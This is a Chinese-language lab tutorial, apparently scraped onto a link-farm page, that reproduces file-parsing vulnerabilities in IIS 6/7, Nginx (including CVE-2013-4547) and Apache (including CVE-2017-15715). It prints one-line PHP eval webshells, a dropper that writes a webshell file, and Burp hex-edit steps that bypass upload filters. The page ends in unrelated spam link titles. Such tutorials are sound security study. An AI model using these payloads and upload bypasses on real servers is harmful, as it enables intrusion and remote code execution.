当前位置: 首页 > news >正文

室内装修网站公司网站维护建设费入什么科目

室内装修网站,公司网站维护建设费入什么科目,哪家公司建网站好,产品seo优化一.IIS解析漏洞复现 1.IIS6.X 方式一:目录解析 搭建IIS环境 在网站下建立文件夹的名字为.asp/.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 访问成功被解析 方式一:目录解析 在IIS 6处理文件解…

一.IIS解析漏洞复现

1.IIS6.X

方式一:目录解析

搭建IIS环境

在网站下建立文件夹的名字为.asp/.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

 

访问成功被解析

方式一:目录解析

在IIS 6处理文件解析时,分号可以起到截断的效果。也就是说 shel.asp;.jpg会被服务器看成是shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx

创建一个文件1.asp;.jpg

写入以下内容

访问,成功被解析

2.IIS7.X

在I1S7.0和I1S7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。

首先安装phpStudyIIS版

再安装对应的Windows服务,启动phpStudy

打开IIS管理器,做如下操作,点击确定

找到php的配置文件将下面内容取消注释,重启phpStudy

在网站的根目录下创建一个1.jpg写入以下内容<?php phpinfo(); ?>,在路径后加上/.php访问,php代码被成功解析

二.Nginx解析漏洞复现

创建环境

安装docker:all docker.io

安装docker-compose:apt install docker-compose

拉取靶场镜像:git clone https://github.com/vulhub/vulhub.git

进入以下Vulhub路径并开启容器

cd /nginx/nginx_parsing_vulnerability

docker-compose build

docker-compose up -d

docker ps -a

1.nginx_parsing

这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的文件,PHP就会向前递归解析。在一个文件/xx.jpg后面加上/.php会将/xx.jpg/xx.php 解析为 php 文件。

上传一个jpg文件写入以下代码GIF89a

<?php phpinfo(); ?>,上传

上传成功

在路径后面加入/.php访问,成功解析到文件里的php代码

2.CVE-2013-4547

上传文件,文件里写入<?php fputs(fopen('xnq.php','w'),'<?php @eval($_POST["cmd"])?>');?>

Bp开启抓包,提交查询

点击Hex,找到刚刚的两个空格,修改第二个20为00,放行

上传成功

在.php和.jpg中间输入两个空格,访问抓包

点击Hex,找到第修改的二个空格修改20为00,放行

访问成功,代码被成功执行

再访问一下我们的写入的木马文件,成功访问,说明写入成功

用中国蚁剑链接,连接成功

三.Apache解析漏洞复现

1.apache_parsing

上传一个后缀名是.php.jpg的文件里面写入<?php phpinfo(); ?>

上传成功

访问上传的文件,php代码被成功解析

2.CVE-2017-15715

上传文件,文件里写入一句话木马<?php @eval($_POST['cmd']); ?>

Bp开启抓包,提交查询

点击Hex,修改20为0a,放行

访问文件名+%0a,访问成功

用中国蚁剑链接,连接成功

http://www.15wanjia.com/news/178639.html

相关文章:

  • 网站 设计 语言网站收索功能怎么做
  • 广州网站搭建哪家好钢筋网片每平米重量
  • 长春高端品牌网站建设wordpress程序伪静态
  • 女生自己做网站成都附近的旅游景点大全
  • 网站读取错误时怎样做企业网站建设在国内现状
  • 想做一个网站平台怎么做中国电子商务平台
  • wap网站后台模板许昌市做网站汉狮网络
  • 免费网站安全软件下载安装自己电脑做网站域名备案
  • 怎么设置网站字体crm系统公司排名
  • 高密网站建设东莞市找工作上什么网
  • 天津企业网站模板建站哪家好个人网页制作源代码博客
  • 政务系统网站建设工作先进个人主要事迹5G网站建设要多少个
  • 开网店 建网站要钱吗农产品网站建设策划方案
  • 电商网站服务排名微网站用什么做
  • 企业网站建设与管理简述电脑做服务器发布网站吗
  • 浙江省建设监理协会官方网站电子商务系统的构成
  • 南宁seo规则seo网站内容更新
  • 国家工信部网站备案WordPress页面添加最新文章
  • .net core 网站开发就业合同模板
  • 公司门户网站建设费计入什么科目网上购物平台大全
  • 企业网站html个人网站建设规划表
  • 外国网站在内地做seo百度广告多少钱
  • 高质量营销型网站定做价格个人网站模板之家
  • 品牌网站建设策做一套网页设计多少钱
  • 网站开发流程介绍网页设计就业方向
  • 有哪些做网站的公司好怎样咨询网络服务商
  • 讲究 网站广州市民政局网站建设
  • 学做软件的网站有哪些自己做社交网站吗
  • 天长街道两学一做网站网站设置右击不了如何查看源代码
  • 诚信网站 互联网建站个人电脑做网站服务器网站